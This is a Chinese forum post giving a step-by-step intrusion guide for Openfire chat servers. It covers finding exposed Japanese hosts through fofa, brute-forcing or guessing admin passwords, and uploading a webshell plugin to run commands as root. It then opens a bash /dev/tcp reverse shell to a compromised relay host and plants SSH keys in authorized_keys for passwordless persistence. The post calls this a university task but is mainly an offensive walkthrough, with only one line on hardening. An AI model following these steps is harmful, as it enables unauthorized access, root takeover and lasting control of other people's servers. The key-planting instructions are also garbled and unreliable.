设为首页 收藏本站
查看: 1093|回复: 0

[经验分享] OpenFire后台插件上传获取webshell及免密码登录linux服务器

[复制链接]

尚未签到

发表于 2017-10-25 10:56:17 | 显示全部楼层 |阅读模式
  本次渗透源于高校任务,在渗透过程中发现,对方IP地址段安装有opernfire,服务器8080端口可以正常访问,后面通过了解Openfire是开源的、基于可拓展通讯和表示协议(XMPP)、采用Java编程语言开发的实时协作服务器。 Openfire安装和使用都非常简单,并利用Web进行管理,单台服务器可支持上万并发用户,一般在大型企业用的比较多。Openfire跟Jboss类似,也可以通过插件上传来获取Webshell,只是Openfire的插件需要修改代码并进行编译,经过研究测试,只要有登录账号,通过上传插件可以获取webshell,一般获取的权限都较高为root系统权限,国外服务器一般单独给Openfire权限,下面是整个渗透过程。
1.目标获取
(1)fofa.so网站使用搜索body="Openfire,版本: " && country=JP,可以获取日本存在的Openfire服务器。如图1所示。


141cf2a93e5cd9964039ee3b913bd0b2.jpg-wh_500x0-wm_3-wmp_4-s_3194536557.jpg
图1搜索目标
2.暴力或者使用弱口令登录系统
   一般弱口令admin/admin、admin/admin888、admin/123456,如果不是这些请直接使用burpsuite进行暴力破解,能够正常访问的网站,如图2所示,openfire可能开放不同端口。

5a14b76c6927321429d3499736f7a693.jpg-wh_500x0-wm_3-wmp_4-s_2598965062.jpg
图2openfire后台登陆地址
3.进入后台
   输入密码正确后,如图3所示,进入后台,可以查看服务器设置,查看用户/用户群,查看会话,分组聊天以及插件等信息。
8820232d21c60400504311b54335dd2c.jpg-wh_500x0-wm_3-wmp_4-s_1613322589.jpg 图3进入后台
4.查看并上传插件
   单击插件,再其中可以看到所有的插件列表,在上传插件下单击上传插件,选择专门生成的openfire带webshell的插件,如图4所示。
7e8f5d8a485696f9be1d4b231b79f8d7.jpg-wh_500x0-wm_3-wmp_4-s_747165398.jpg
图4上传插件
在本次测试中,从互联网收集了连个插件,如图5所示,均成功上传。

3abe88f057b3f08f4d111009e5f859e4.jpg-wh_500x0-wm_3-wmp_4-s_1397311925.jpg
图5上传带webshell的插件
5.获取webshell
(1)helloworld插件获取webshell
  单击服务器-服务器设置,如图6所示,如果helloworld插件上传并运行成功,则会在配置文件下面生成一个用户接口设置。单击该链接即可获取webshel,如图7所示。

a910926703829d314fef4df59a355aef.jpg-wh_500x0-wm_3-wmp_4-s_260306256.jpg
图6查看服务器设置
5dd528ef3c2dd0dea41a0b39b012a5d5.jpg-wh_500x0-wm_3-wmp_4-s_2803814035.jpg

图7获取webshell
(2)broadcast插件获取webshell
   通过url+ plugins/broadcast/webshell文件名称来和获取:
http://xxx.xxx.xxx.xxx:8080/plugins/broadcast/cmd.jsp?cmd=whoami
http://xxx.xxx.xxx.xxx:8080/plugins/broadcast/browser.jsp
   在helloworld插件中也可以通过地址来获取
http://xxx.xxx.xxx.xxx:8080/plugins/helloworld/chakan.jsp
  如图8,图9所示,分别获取broadcast的webshell以及查看当前用户权限为root。

a830a6f4a6cd0632f8557c74bade1015.jpg-wh_500x0-wm_3-wmp_4-s_713932526.jpg
图8获取当前用户权限

2a4fbe6c0d3a45e51027788734b4dbd8.jpg-wh_500x0-wm_3-wmp_4-s_2829736516.jpg
图9获取webshell
6.免root密码登录服务器
   渗透到这里按照过去的思路应该已经结束,不过笔者还想尝试另外一种思路,虽然我们通过webshell可以获取/etc/shadow文件,但该root及其它用户的密码明显不是那么容易被破解的。服务器上面用ssh,能否利用公私钥来解决访问问题。
(1)反弹到肉鸡
执行一下命令,将该服务器反弹到肉鸡服务器xxx.xxx.xxx.xxx的8080端口,需要提前使用nc监听8080端口,也即执行“nc-vv -l -p 8080”如图10所示。

fcaa09ea3bf1c3cc0ec7c3a99aedcc6b.jpg-wh_500x0-wm_3-wmp_4-s_2326336133.jpg
图10监听8080端口
(2)反弹shell到肉鸡
执行命令“bash -i>& /dev/tcp/xxx.xxx.xxx.xxx/8080 0>&1”反弹到肉鸡,如图11所示,获取一个反弹shell。

ef091100f96d18cf15a5c9ffcf562105.jpg-wh_500x0-wm_3-wmp_4-s_4195721330.jpg
图11反弹shell
7.实际操作流程
(1)远程服务器生成公私钥
在被渗透的服务器上执行“ssh-keygen -t rsa”命令,默认三次回车,如图12所示,会在root/.ssh/目录下生成id_rsa及id_rsa.pub,其中id_rsa为服务器私钥,特别重要,id_rsa.pub为公钥。
1b8dcb5686c26f2b3741ce965325d1d2.jpg-wh_500x0-wm_3-wmp_4-s_1974948134.jpg
图12在远处服务器上生成公私钥
(2)本地linux 上生成公私钥
  在本地linux上执行命令“ssh-keygen -t rsa”生成公私钥,将远程服务器的id_rsa下载到本地,执行命令“cat id_rsa > /root/.ssh/authorized_keys”命令,将远处服务器的私钥生成到authorized_keys文件。
(3)将本地公钥上传到远程服务器上并生成authorized_keys
catid_rsa.pub >/root/.ssh/authorized_keys
(4)删除多余文件
rmid_rsa.pub
rmid_rsa
(5)登录服务器
   使用“[url=]sshroot@1xx.1xx.111.1xx[/url]”登录服务器,不用输入远程服务器的密码,达到完美登录服务器的目的。

8总结
(1)Openfire需要获取管理员帐号和密码,目前通杀所有帮本。Openfire最新版本为4.1.5.
(2)可以通过burpsuite进行admin管理员帐号的暴力破解。
(3)使用openfire安全加固,可以使用强密码,同时严格设置插件权限,建议除了必须的插件目录外,禁用新创建目录。


运维网声明 1、欢迎大家加入本站运维交流群:群②:261659950 群⑤:202807635 群⑦870801961 群⑧679858003
2、本站所有主题由该帖子作者发表,该帖子作者与运维网享有帖子相关版权
3、所有作品的著作权均归原作者享有,请您和我们一样尊重他人的著作权等合法权益。如果您对作品感到满意,请购买正版
4、禁止制作、复制、发布和传播具有反动、淫秽、色情、暴力、凶杀等内容的信息,一经发现立即删除。若您因此触犯法律,一切后果自负,我们对此不承担任何责任
5、所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其内容的准确性、可靠性、正当性、安全性、合法性等负责,亦不承担任何法律责任
6、所有作品仅供您个人学习、研究或欣赏,不得用于商业或者其他用途,否则,一切后果均由您自己承担,我们对此不承担任何法律责任
7、如涉及侵犯版权等问题,请您及时通知我们,我们将立即采取措施予以解决
8、联系人Email:admin@iyunv.com 网址:www.yunweiku.com

所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其承担任何法律责任,如涉及侵犯版权等问题,请您及时通知我们,我们将立即处理,联系人Email:kefu@iyunv.com,QQ:1061981298 本贴地址:https://www.yunweiku.com/thread-405884-1-1.html 上篇帖子: CentOS 6.x安装php 5.6和redis扩展的全过程 下篇帖子: Redis从入门到精通视频及pdf文档
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

扫码加入运维网微信交流群X

扫码加入运维网微信交流群

扫描二维码加入运维网微信交流群,最新一手资源尽在官方微信交流群!快快加入我们吧...

扫描微信二维码查看详情

客服E-mail:kefu@iyunv.com 客服QQ:1061981298


QQ群⑦:运维网交流群⑦ QQ群⑧:运维网交流群⑧ k8s群:运维网kubernetes交流群


提醒:禁止发布任何违反国家法律、法规的言论与图片等内容;本站内容均来自个人观点与网络等信息,非本站认同之观点.


本站大部分资源是网友从网上搜集分享而来,其版权均归原作者及其网站所有,我们尊重他人的合法权益,如有内容侵犯您的合法权益,请及时与我们联系进行核实删除!



合作伙伴: 青云cloud

快速回复 返回顶部 返回列表